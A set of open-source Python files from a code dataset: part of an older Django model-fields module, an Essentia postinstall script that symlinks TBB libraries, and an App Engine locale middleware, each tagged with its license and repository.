Used by the default implementations of ``get_db_prep_save``and
`get_db_prep_lookup```
"""
if not prepared:
value = self.get_prep_value(value)
return value
def get_db_prep_save(self, value, connection):
"""
Returns field's value prepared for saving into a database.
"""
return self.get_db_prep_value(value, connection=connection,
prepared=False)
def get_prep_lookup(self, lookup_type, value):
"""
Perform preliminary non-db specific lookup checks and conversions
"""
if hasattr(value, 'prepare'):
return value.prepare()
if hasattr(value, '_prepare'):
return value._prepare()
if lookup_type in (
'regex', 'iregex', 'month', 'day', 'week_day', 'search',
'contains', 'icontains', 'iexact', 'startswith', 'istartswith',
'endswith', 'iendswith', 'isnull'
):
return value
elif lookup_type in ('exact', 'gt', 'gte', 'lt', 'lte'):
return self.get_prep_value(value)
elif lookup_type in ('range', 'in'):
return [self.get_prep_value(v) for v in value]
elif lookup_type == 'year':
try:
return int(value)
except ValueError:
raise ValueError("The __year lookup type requires an integer "
"argument")
raise TypeError("Field has invalid lookup: %s" % lookup_type)
def get_db_prep_lookup(self, lookup_type, value, connection,
prepared=False):
"""
Returns field's value prepared for database lookup.
"""
if not prepared:
value = self.get_prep_lookup(lookup_type, value)
if hasattr(value, 'get_compiler'):
value = value.get_compiler(connection=connection)
if hasattr(value, 'as_sql') or hasattr(value, '_as_sql'):
# If the value has a relabel_aliases method, it will need to
# be invoked before the final SQL is evaluated
if hasattr(value, 'relabel_aliases'):
return value
if hasattr(value, 'as_sql'):
sql, params = value.as_sql()
else:
sql, params = value._as_sql(connection=connection)
return QueryWrapper(('(%s)' % sql), params)
if lookup_type in ('regex', 'iregex', 'month', 'day', 'week_day',
'search'):
return [value]
elif lookup_type in ('exact', 'gt', 'gte', 'lt', 'lte'):
return [self.get_db_prep_value(value, connection=connection,
prepared=prepared)]
elif lookup_type in ('range', 'in'):
return [self.get_db_prep_value(v, connection=connection,
prepared=prepared) for v in value]
elif lookup_type in ('contains', 'icontains'):
return ["%%%s%%" % connection.ops.prep_for_like_query(value)]
elif lookup_type == 'iexact':
return [connection.ops.prep_for_iexact_query(value)]
elif lookup_type in ('startswith', 'istartswith'):
return ["%s%%" % connection.ops.prep_for_like_query(value)]
elif lookup_type in ('endswith', 'iendswith'):
return ["%%%s" % connection.ops.prep_for_like_query(value)]
elif lookup_type == 'isnull':
return []
elif lookup_type == 'year':
if self.get_internal_type() == 'DateField':
return connection.ops.year_lookup_bounds_for_date_field(value)
else:
return connection.ops.year_lookup_bounds(value)
def has_default(self):
"""
Returns a boolean of whether this field has a default value.
"""
return self.default is not NOT_PROVIDED
def get_default(self):
"""
Returns the default value for this field.
"""
if self.has_default():
if callable(self.default):
return self.default()
return force_unicode(self.default, strings_only=True)
if (not self.empty_strings_allowed or (self.null and
not connection.features.interprets_empty_strings_as_nulls)):
return None
return ""
def get_validator_unique_lookup_type(self):
return '%s__exact' % self.name
def get_choices(self, include_blank=True, blank_choice=BLANK_CHOICE_DASH):
"""Returns choices with a default blank choices included, for use
as SelectField choices for this field."""
first_choice = include_blank and blank_choice or []
if self.choices:
return first_choice + list(self.choices)
rel_model = self.rel.to
if hasattr(self.rel, 'get_related_field'):
lst = [(getattr(x, self.rel.get_related_field().attname),
smart_unicode(x))
for x in rel_model._default_manager.complex_filter(
self.rel.limit_choices_to)]
else:
lst = [(x._get_pk_val(), smart_unicode(x))
for x in rel_model._default_manager.complex_filter(
self.rel.limit_choices_to)]
return first_choice + lst
def get_choices_default(self):
return self.get_choices()
def get_flatchoices(self, include_blank=True,
blank_choice=BLANK_CHOICE_DASH):
"""
Returns flattened choices with a default blank choice included.
"""
first_choice = include_blank and blank_choice or []
return first_choice + list(self.flatchoices)
def _get_val_from_obj(self, obj):
if obj is not None:
return getattr(obj, self.attname)
else:
return self.get_default()
def value_to_string(self, obj):
"""
Returns a string value of this field from the passed obj.
This is used by the serialization framework.
"""
return smart_unicode(self._get_val_from_obj(obj))
def bind(self, fieldmapping, original, bound_field_class):
return bound_field_class(self, fieldmapping, original)
def _get_choices(self):
if hasattr(self._choices, 'next'):
choices, self._choices = tee(self._choices)
return choices
else:
return self._choices
choices = property(_get_choices)
def _get_flatchoices(self):
"""Flattened version of choices tuple."""
flat = []
for choice, value in self.choices:
if isinstance(value, (list, tuple)):
flat.extend(value)
else:
flat.append((choice,value))
return flat
flatchoices = property(_get_flatchoices)
def save_form_data(self, instance, data):
setattr(instance, self.name, data)
def formfield(self, form_class=forms.CharField, **kwargs):
"""
Returns a django.forms.Field instance for this database Field.
"""
defaults = {'required': not self.blank,
'label': capfirst(self.verbose_name),
'help_text': self.help_text}
if self.has_default():
if callable(self.default):
defaults['initial'] = self.default
defaults['show_hidden_initial'] = True
else:
defaults['initial'] = self.get_default()
if self.choices:
# Fields with choices get special treatment.
include_blank = (self.blank or
not (self.has_default() or 'initial' in kwargs))
defaults['choices'] = self.get_choices(include_blank=include_blank)
defaults['coerce'] = self.to_python
if self.null:
defaults['empty_value'] = None
form_class = forms.TypedChoiceField
# Many of the subclass-specific formfield arguments (min_value,
# max_value) don't apply for choice fields, so be sure to only pass
# the values that TypedChoiceField will understand.
for k in kwargs.keys():
if k not in ('coerce', 'empty_value', 'choices', 'required',
'widget', 'label', 'initial', 'help_text',
'error_messages', 'show_hidden_initial'):
del kwargs[k]
defaults.update(kwargs)
return form_class(**defaults)
def value_from_object(self, obj):
"""
Returns the value of this field in the given model instance.
"""
return getattr(obj, self.attname)
def __repr__(self):
"""
Displays the module, class and name of the field.
"""
path = '%s.%s' % (self.__class__.__module__, self.__class__.__name__)
name = getattr(self, 'name', None)
if name is not None:
return '<%s: %s>' % (path, name)
return '<%s>' % path
class AutoField(Field):
description = _("Integer")
empty_strings_allowed = False
default_error_messages = {
'invalid': _(u"'%s' value must be an integer."),
}
def __init__(self, *args, **kwargs):
assert kwargs.get('primary_key', False) is True, \
"%ss must have primary_key=True." % self.__class__.__name__
kwargs['blank'] = True
Field.__init__(self, *args, **kwargs)
def get_internal_type(self):
return "AutoField"
def to_python(self, value):
if value is None:
return value
try:
return int(value)
except (TypeError, ValueError):
msg = self.error_messages['invalid'] % str(value)
raise exceptions.ValidationError(msg)
def validate(self, value, model_instance):
pass
def get_prep_value(self, value):
if value is None:
return None
return int(value)
def contribute_to_class(self, cls, name):
assert not cls._meta.has_auto_field, \
"A model can't have more than one AutoField."
super(AutoField, self).contribute_to_class(cls, name)
cls._meta.has_auto_field = True
cls._meta.auto_field = self
def formfield(self, **kwargs):
return None
class BooleanField(Field):
empty_strings_allowed = False
default_error_messages = {
'invalid': _(u"'%s' value must be either True or False."),
}
description = _("Boolean (Either True or False)")
def __init__(self, *args, **kwargs):
kwargs['blank'] = True
if 'default' not in kwargs and not kwargs.get('null'):
kwargs['default'] = False
Field.__init__(self, *args, **kwargs)
def get_internal_type(self):
return "BooleanField"
def to_python(self, value):
if value in (True, False):
# if value is 1 or 0 than it's equal to True or False, but we want
# to return a true bool for semantic reasons.
return bool(value)
if value in ('t', 'True', '1'):
return True
if value in ('f', 'False', '0'):
return False
msg = self.error_messages['invalid'] % str(value)
raise exceptions.ValidationError(msg)
def get_prep_lookup(self, lookup_type, value):
# Special-case handling for filters coming from a Web request (e.g. the
# admin interface). Only works for scalar values (not lists). If you're
# passing in a list, you might as well make things the right type when
# constructing the list.
if value in ('1', '0'):
value = bool(int(value))
return super(BooleanField, self).get_prep_lookup(lookup_type, value)
def get_prep_value(self, value):
if value is None:
return None
return bool(value)
def formfield(self, **kwargs):
# Unlike most fields, BooleanField figures out include_blank from
# self.null instead of self.blank.
if self.choices:
include_blank = (self.null or
not (self.has_default() or 'initial' in kwargs))
defaults = {'choices': self.get_choices(
include_blank=include_blank)}
else:
defaults = {'form_class': forms.BooleanField}
defaults.update(kwargs)
return super(BooleanField, self).formfield(**defaults)
class CharField(Field):
description = _("String (up to %(max_length)s)")
def __init__(self, *args, **kwargs):
super(CharField, self).__init__(*args, **kwargs)
self.validators.append(validators.MaxLengthValidator(self.max_length))
def get_internal_type(self):
return "CharField"
def to_python(self, value):
if isinstance(value, basestring) or value is None:
return value
return smart_unicode(value)
def get_prep_value(self, value):
return self.to_python(value)
def formfield(self, **kwargs):
# Passing max_length to forms.CharField means that the value's length
# will be validated twice. This is considered acceptable since we want
# the value in the form field (to pass into widget for example).
defaults = {'max_length': self.max_length}
defaults.update(kwargs)
return super(CharField, self).formfield(**defaults)
# TODO: Maybe move this into contrib, because it's specialized.
class CommaSeparatedIntegerField(CharField):
default_validators = [validators.validate_comma_separated_integer_list]
description = _("Comma-separated integers")
def formfield(self, **kwargs):
defaults = {
'error_messages': {
'invalid': _(u'Enter only digits separated by commas.'),
}
}
defaults.update(kwargs)
return super(CommaSeparatedIntegerField, self).formfield(**defaults)
class DateField(Field):
empty_strings_allowed = False
default_error_messages = {
'invalid': _(u"'%s' value has an invalid date format. It must be "
u"in YYYY-MM-DD format."),
'invalid_date': _(u"'%s' value has the correct format (YYYY-MM-DD) "
u"but it is an invalid date."),
}
description = _("Date (without time)")
def __init__(self, verbose_name=None, name=None, auto_now=False,
auto_now_add=False, **kwargs):
self.auto_now, self.auto_now_add = auto_now, auto_now_add
if auto_now or auto_now_add:
kwargs['editable'] = False
kwargs['blank'] = True
Field.__init__(self, verbose_name, name, **kwargs)
def get_internal_type(self):
return "DateField"
def to_python(self, value):
if value is None:
return value
if isinstance(value, datetime.datetime):
return value.date()
if isinstance(value, datetime.date):
return value
value = smart_str(value)
try:
parsed = parse_date(value)
if parsed is not None:
return parsed
except ValueError:
msg = self.error_messages['invalid_date'] % value
raise exceptions.ValidationError(msg)
msg = self.error_messages['invalid'] % value
raise exceptions.ValidationError(msg)
def pre_save(self, model_instance, add):
if self.auto_now or (self.auto_now_add and add):
value = datetime.date.today()
setattr(model_instance, self.attname, value)
return value
else:
return super(DateField, self).pre_save(model_instance, add)
def contribute_to_class(self, cls, name):
super(DateField,self).contribute_to_class(cls, name)
if not self.null:
setattr(cls, 'get_next_by_%s' % self.name,
curry(cls._get_next_or_previous_by_FIELD, field=self,
is_next=True))
setattr(cls, 'get_previous_by_%s' % self.name,
curry(cls._get_next_or_previous_by_FIELD, field=self,
is_next=False))
def get_prep_lookup(self, lookup_type, value):
# For "__month", "__day", and "__week_day" lookups, convert the value
# to an int so the database backend always sees a consistent type.
if lookup_type in ('month', 'day', 'week_day'):
return int(value)
return super(DateField, self).get_prep_lookup(lookup_type, value)
def get_prep_value(self, value):
return self.to_python(value)
def get_db_prep_value(self, value, connection, prepared=False):
# Casts dates into the format expected by the backend
if not prepared:
value = self.get_prep_value(value)
return connection.ops.value_to_db_date(value)
def value_to_string(self, obj):
val = self._get_val_from_obj(obj)
return '' if val is None else val.isoformat()
def formfield(self, **kwargs):
defaults = {'form_class': forms.DateField}
defaults.update(kwargs)
return super(DateField, self).formfield(**defaults)
class DateTimeField(DateField):
empty_strings_allowed = False
default_error_messages = {
'invalid': _(u"'%s' value has an invalid format. It must be in "
u"YYYY-MM-DD HH:MM[:ss[.uuuuuu]][TZ] format."),
'invalid_date': _(u"'%s' value has the correct format "
u"(YYYY-MM-DD) but it is an invalid date."),
'invalid_datetime': _(u"'%s' value has the correct format "
u"(YYYY-MM-DD HH:MM[:ss[.uuuuuu]][TZ]) "
u"but it is an invalid date/time."),
}
description = _("Date (with time)")
# __init__ is inherited from DateField
def get_internal_type(self):
return "DateTimeField"
def to_python(self, value):
if value is None:
return value
if isinstance(value, datetime.datetime):
return value
if isinstance(value, datetime.date):
value = datetime.datetime(value.year, value.month, value.day)
if settings.USE_TZ:
# For backwards compatibility, interpret naive datetimes in
# local time. This won't work during DST change, but we can't
# do much about it, so we let the exceptions percolate up the
# call stack.
warnings.warn(u"DateTimeField received a naive datetime (%s)"
u" while time zone support is active." % value,
RuntimeWarning)
default_timezone = timezone.get_default_timezone()
value = timezone.make_aware(value, default_timezone)
return value
value = smart_str(value)
try:
parsed = parse_datetime(value)
if parsed is not None:
return parsed
except ValueError:
msg = self.error_messages['invalid_datetime'] % value
raise exceptions.ValidationError(msg)
try:
parsed = parse_date(value)
if parsed is not None:
return datetime.datetime(parsed.year, parsed.month, parsed.day)
except ValueError:
msg = self.error_messages['invalid_date'] % value
raise exceptions.ValidationError(msg)
msg = self.error_messages['invalid'] % value
raise exceptions.ValidationError(msg)
def pre_save(self, model_instance, add):
if self.auto_now or (self.auto_now_add and add):
value = timezone.now()
setattr(model_instance, self.attname, value)
return value
else:
return super(DateTimeField, self).pre_save(model_instance, add)
# contribute_to_class is inherited from DateField, it registers
# get_next_by_FOO and get_prev_by_FOO
# get_prep_lookup is inherited from DateField
def get_prep_value(self, value):
value = self.to_python(value)
if value is not None and settings.USE_TZ and timezone.is_naive(value):
# For backwards compatibility, interpret naive datetimes in local
# time. This won't work during DST change, but we can't do much
# about it, so we let the exceptions percolate up the call stack.
warnings.warn(u"DateTimeField received a naive datetime (%s)"
u" while time zone support is active." % value,
RuntimeWarning)
default_timezone = timezone.get_default_timezone()
value = timezone.make_aware(value, default_timezone)
return value
def get_db_prep_value(self, value, connection, prepared=False):
# Casts datetimes into the format expected by the backend
if not prepared:
value = self.get_prep_value(value)
return connection.ops.value_to_db_datetime(value)
def value_to_string(self, obj):
val = self._get_val_from_obj(obj)
return '' if val is None else val.isoformat()
def formfield(self, **kwargs):
defaults = {'form_class': forms.DateTimeField}
defaults.update(kwargs)
return super(DateTimeField, self).formfield(**defaults)
class DecimalField(Field):
empty_strings_allowed = False
default_error_messages = {
'invalid': _(u"'%s' value must be a decimal number."),
}
description = _("Decimal number")
def __init__(self, verbose_name=None, name=None, max_digits=None,
decimal_places=None, **kwargs):
self.max_digits, self.decimal_places = max_digits, decimal_places
Field.__init__(self, verbose_name, name, **kwargs)
def get_internal_type(self):
return "DecimalField"
def to_python(self, value):
if value is None:
return value
try:
return decimal.Decimal(value)
except decimal.InvalidOperation:
msg = self.error_messages['invalid'] % str(value)
raise exceptions.ValidationError(msg)
def _format(self, value):
if isinstance(value, basestring) or value is None:
return value
else:
return self.format_number(value)
def format_number(self, value):
"""
Formats a number into a string with the requisite number of digits and
decimal places.
"""
# Method moved to django.db.backends.util.
#
# It is preserved because it is used by the oracle backend
# (django.db.backends.oracle.query), and also for
# backwards-compatibility with any external code which may have used
# this method.
from django.db.backends import util
return util.format_number(value, self.max_digits, self.decimal_places)
def get_db_prep_save(self, value, connection):
return connection.ops.value_to_db_decimal(self.to_python(value),
self.max_digits, self.decimal_places)
def get_prep_value(self, value):
return self.to_python(value)
def formfield(self, **kwargs):
defaults = {
'max_digits': self.max_digits,
'decimal_places': self.decimal_places,
'form_class': forms.DecimalField,
}
defaults.update(kwargs)
return super(DecimalField, self).formfield(**defaults)
class EmailField(CharField):
default_validators = [validators.validate_email]
description = _("E-mail address")
def __init__(self, *args, **kwargs):
kwargs['max_length'] = kwargs.get('max_length', 75)
CharField.__init__(self, *args, **kwargs)
def formfield(self, **kwargs):
# As with CharField, this will cause email validation to be performed
# twice.
defaults = {
'form_class': forms.EmailField,
}
defaults.update(kwargs)
return super(EmailField, self).formfield(**defaults)
class FilePathField(Field):
description = _("File path")
def __init__(self, verbose_name=None, name=None, path='', match=None,
recursive=False, **kwargs):
self.path, self.match, self.recursive = path, match, recursive
kwargs['max_length'] = kwargs.get('max_length', 100)
Field.__init__(self, verbose_name, name, **kwargs)
def get_prep_value(self, value):
value = super(FilePathField, self).get_prep_value(value)
if value is None:
return None
return smart_unicode(value)
def formfield(self, **kwargs):
defaults = {
'path': self.path,
'match': self.match,
'recursive': self.recursive,
'form_class': forms.FilePathField,
}
defaults.update(kwargs)
return super(FilePathField, self).formfield(**defaults)
def get_internal_type(self):
return "FilePathField"
class FloatField(Field):
empty_strings_allowed = False
default_error_messages = {
'invalid': _("'%s' value must be a float."),
}
description = _("Floating point number")
def get_prep_value(self, value):
if value is None:
return None
return float(value)
def get_internal_type(self):
return "FloatField"
def to_python(self, value):
if value is None:
return value
try:
return float(value)
except (TypeError, ValueError):
msg = self.error_messages['invalid'] % str(value)
raise exceptions.ValidationError(msg)
def formfield(self, **kwargs):
defaults = {'form_class': forms.FloatField}
defaults.update(kwargs)
return super(FloatField, self).formfield(**defaults)
class IntegerField(Field):
empty_strings_allowed = False
default_error_messages = {
'invalid': _("'%s' value must be an integer."),
}
description = _("Integer")
def get_prep_value(self, value):
if value is None:
return None
return int(value)
def get_prep_lookup(self, lookup_type, value):
if ((lookup_type == 'gte' or lookup_type == 'lt')
and isinstance(value, float)):
value = math.ceil(value)
return super(IntegerField, self).get_prep_lookup(lookup_type, value)
def get_internal_type(self):
return "IntegerField"
def to_python(self, value):
if value is None:
return value
try:
return int(value)
except (TypeError, ValueError):
msg = self.error_messages['invalid'] % str(value)
raise exceptions.ValidationError(msg)
def formfield(self, **kwargs):
defaults = {'form_class': forms.IntegerField}
defaults.update(kwargs)
return super(IntegerField, self).formfield(**defaults)
class BigIntegerField(IntegerField):
empty_strings_allowed = False
description = _("Big (8 byte) integer")
MAX_BIGINT = 9223372036854775807
def get_internal_type(self):
return "BigIntegerField"
def formfield(self, **kwargs):
defaults = {'min_value': -BigIntegerField.MAX_BIGINT - 1,
'max_value': BigIntegerField.MAX_BIGINT}
defaults.update(kwargs)
return super(BigIntegerField, self).formfield(**defaults)
class IPAddressField(Field):
empty_strings_allowed = False
description = _("IPv4 address")
def __init__(self, *args, **kwargs):
kwargs['max_length'] = 15
Field.__init__(self, *args, **kwargs)
def get_prep_value(self, value):
value = super(IPAddressField, self).get_prep_value(value)
if value is None:
return None
return smart_unicode(value)
def get_internal_type(self):
return "IPAddressField"
def formfield(self, **kwargs):
defaults = {'form_class': forms.IPAddressField}
defaults.update(kwargs)
return super(IPAddressField, self).formfield(**defaults)
class GenericIPAddressField(Field):
empty_strings_allowed = True
description = _("IP address")
default_error_messages = {}
def __init__(self, verbose_name=None, name=None, protocol='both',
unpack_ipv4=False, *args, **kwargs):
self.unpack_ipv4 = unpack_ipv4
self.default_validators, invalid_error_message = \
validators.ip_address_validators(protocol, unpack_ipv4)
self.default_error_messages['invalid'] = invalid_error_message
kwargs['max_length'] = 39
Field.__init__(self, verbose_name, name, *args, **kwargs)
def get_internal_type(self):
return "GenericIPAddressField"
def to_python(self, value):
if value and ':' in value:
return clean_ipv6_address(value,
self.unpack_ipv4, self.error_messages['invalid'])
return value
def get_db_prep_value(self, value, connection, prepared=False):
if not prepared:
value = self.get_prep_value(value)
return value or None
def get_prep_value(self, value):
if value is None:
return value
if value and ':' in value:
try:
return clean_ipv6_address(value, self.unpack_ipv4)
except exceptions.ValidationError:
pass
return smart_unicode(value)
def formfield(self, **kwargs):
defaults = {'form_class': forms.GenericIPAddressField}
defaults.update(kwargs)
return super(GenericIPAddressField, self).formfield(**defaults)
class NullBooleanField(Field):
empty_strings_allowed = False
default_error_messages = {
'invalid': _("'%s' value must be either None, True or False."),
}
description = _("Boolean (Either True, False or None)")
def __init__(self, *args, **kwargs):
kwargs['null'] = True
kwargs['blank'] = True
Field.__init__(self, *args, **kwargs)
def get_internal_type(self):
return "NullBooleanField"
def to_python(self, value):
if value is None:
return None
if value in (True, False):
return bool(value)
if value in ('None',):
return None
if value in ('t', 'True', '1'):
return True
if value in ('f', 'False', '0'):
return False
msg = self.error_messages['invalid'] % str(value)
raise exceptions.ValidationError(msg)
def get_prep_lookup(self, lookup_type, value):
# Special-case handling for filters coming from a Web request (e.g. the
# admin interface). Only works for scalar values (not lists). If you're
# passing in a list, you might as well make things the right type when
# constructing the list.
if value in ('1', '0'):
value = bool(int(value))
return super(NullBooleanField, self).get_prep_lookup(lookup_type,
value)
def get_prep_value(self, value):
if value is None:
return None
return bool(value)
def formfield(self, **kwargs):
defaults = {
'form_class': forms.NullBooleanField,
'required': not self.blank,
'label': capfirst(self.verbose_name),
'help_text': self.help_text}
defaults.update(kwargs)
return super(NullBooleanField, self).formfield(**defaults)
class PositiveIntegerField(IntegerField):
description = _("Positive integer")
def get_internal_type(self):
return "PositiveIntegerField"
def formfield(self, **kwargs):
defaults = {'min_value': 0}
defaults.update(kwargs)
return super(PositiveIntegerField, self).formfield(**defaults)
class PositiveSmallIntegerField(IntegerField):
description = _("Positive small integer")
def get_internal_type(self):
return "PositiveSmallIntegerField"
def formfield(self, **kwargs):
defaults = {'min_value': 0}
defaults.update(kwargs)
return super(PositiveSmallIntegerField, self).formfield(**defaults)
class SlugField(CharField):
description = _("Slug (up to %(max_length)s)")
def __init__(self, *args, **kwargs):
kwargs['max_length'] = kwargs.get('max_length', 50)
# Set db_index=True unless it's been set manually.
if 'db_index' not in kwargs:
kwargs['db_index'] = True
super(SlugField, self).__init__(*args, **kwargs)
def get_internal_type(self):
return "SlugField"
def formfield(self, **kwargs):
defaults = {'form_class': forms.SlugField}
defaults.update(kwargs)
return super(SlugField, self).formfield(**defaults)
class SmallIntegerField(IntegerField):
description = _("Small integer")
def get_internal_type(self):
return "SmallIntegerField"
class TextField(Field):
description = _("Text")
def get_internal_type(self):
return "TextField"
def get_prep_value(self, value):
if isinstance(value, basestring) or value is None:
return value
return smart_unicode(value)
def formfield(self, **kwargs):
defaults = {'widget': forms.Textarea}
defaults.update(kwargs)
return super(TextField, self).formfield(**defaults)
class TimeField(Field):
empty_strings_allowed = False
default_error_messages = {
'invalid': _(u"'%s' value has an invalid format. It must be in "
u"HH:MM[:ss[.uuuuuu]] format."),
'invalid_time': _(u"'%s' value has the correct format "
u"(HH:MM[:ss[.uuuuuu]]) but it is an invalid time."),
}
description = _("Time")
def __init__(self, verbose_name=None, name=None, auto_now=False,
auto_now_add=False, **kwargs):
self.auto_now, self.auto_now_add = auto_now, auto_now_add
if auto_now or auto_now_add:
kwargs['editable'] = False
kwargs['blank'] = True
Field.__init__(self, verbose_name, name, **kwargs)
def get_internal_type(self):
return "TimeField"
def to_python(self, value):
if value is None:
return None
if isinstance(value, datetime.time):
return value
if isinstance(value, datetime.datetime):
# Not usually a good idea to pass in a datetime here (it loses
# information), but this can be a side-effect of interacting with a
# database backend (e.g. Oracle), so we'll be accommodating.
return value.time()
value = smart_str(value)
try:
parsed = parse_time(value)
if parsed is not None:
return parsed
except ValueError:
msg = self.error_messages['invalid_time'] % value
raise exceptions.ValidationError(msg)
msg = self.error_messages['invalid'] % value
raise exceptions.ValidationError(msg)
def pre_save(self, model_instance, add):
if self.auto_now or (self.auto_now_add and add):
value = datetime.datetime.now().time()
setattr(model_instance, self.attname, value)
return value
else:
return super(TimeField, self).pre_save(model_instance, add)
def get_prep_value(self, value):
return self.to_python(value)
def get_db_prep_value(self, value, connection, prepared=False):
# Casts times into the format expected by the backend
if not prepared:
value = self.get_prep_value(value)
return connection.ops.value_to_db_time(value)
def value_to_string(self, obj):
val = self._get_val_from_obj(obj)
return '' if val is None else val.isoformat()
def formfield(self, **kwargs):
defaults = {'form_class': forms.TimeField}
defaults.update(kwargs)
return super(TimeField, self).formfield(**defaults)
class URLField(CharField):
description = _("URL")
def __init__(self, verbose_name=None, name=None, verify_exists=False,
**kwargs):
kwargs['max_length'] = kwargs.get('max_length', 200)
CharField.__init__(self, verbose_name, name, **kwargs)
self.validators.append(
validators.URLValidator(verify_exists=verify_exists))
def formfield(self, **kwargs):
# As with CharField, this will cause URL validation to be performed
# twice.
defaults = {
'form_class': forms.URLField,
}
defaults.update(kwargs)
return super(URLField, self).formfield(**defaults)
| mit |
milrob/essentia | packaging/darwin/extras/tbb_linker.py | 10 | 1971 | #!/usr/bin/env python
# Copyright (C) 2006-2013 Music Technology Group - Universitat Pompeu Fabra
#
# This file is part of Essentia
#
# Essentia is free software: you can redistribute it and/or modify it under
# the terms of the GNU Affero General Public License as published by the Free
# Software Foundation (FSF), either version 3 of the License, or (at your
# option) any later version.
#
# This program is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
# FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
# details.
#
# You should have received a copy of the Affero GNU General Public License
# version 3 along with this program. If not, see http://www.gnu.org/licenses/
# this script is used in the postinstall stage to create dynamic linking for
# tbb src and libs
import os
essentia_third_party = '/essentia/third_party/'
tbb_mac = essentia_third_party + 'tbb20_020oss_mac/ia32/cc4.0.1_os10.4.9/'
tbb_src = essentia_third_party + 'tbb20_020oss_src/'
def link(source, target):
cmd = 'sudo ln -s' + ' ' + source + ' ' + target
print cmd
return os.system(cmd);
def link_tbb_files() :
source = [tbb_src + 'include/tbb',
tbb_mac + 'lib/libtbb.dylib',
tbb_mac + 'lib/libtbb_debug.dylib',
tbb_mac + 'lib/libtbbmalloc.dylib',
tbb_mac + 'lib/libtbbmalloc_debug.dylib']
target = [essentia_third_party + 'include/tbb',
essentia_third_party + 'lib/libtbb.dylib',
essentia_third_party + 'lib/libtbb_debug.dylib',
essentia_third_party + 'lib/libtbbmalloc.dylib',
essentia_third_party + 'lib/libtbbmalloc_debug.dylib']
ret = 0
for i in range(len(source)):
ret += link(source[i], target[i])
return ret
if __name__ == '__main__':
ret = link_tbb_files();
print "returning ", ret
exit(ret)
| agpl-3.0 |
faahbih/projetoolivarts | backend/appengine/apps/locale_app/middleware.py | 48 | 1406 | # -*- coding: utf-8 -*-
from __future__ import absolute_import, unicode_literals
from webapp2_extras import i18n
from tekton.gae.middleware import Middleware
class LocaleMiddleware(Middleware):
def _handle(self, locale_key):
if locale_key in self.request_args:
locale = self.request_args.get(locale_key, '')
print 'Locale ' + locale_key
self.request_args.pop(locale_key)
if locale:
locale_obj = i18n.get_i18n()
locale_obj.set_locale(locale)
import settings # this is here to avoid cyclic dependency
locale_obj.set_timezone(settings.DEFAULT_TIMEZONE)
return True
def set_up(self):
handled = self._handle('locale')
# fucking Facebook scrapper sending undesired param
handled = self._handle('fb_locale') or handled
user = self.dependencies['_logged_user']
import settings # this is here to avoid cyclic dependency
if user:
locale_obj = i18n.get_i18n()
locale_obj.set_locale(user.locale or settings.DEFAULT_LOCALE)
locale_obj.set_timezone(user.timezone or settings.DEFAULT_TIMEZONE)
elif not handled:
locale_obj = i18n.get_i18n()
locale_obj.set_locale(settings.DEFAULT_LOCALE)
locale_obj.set_timezone(settings.DEFAULT_TIMEZONE)
| mit |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.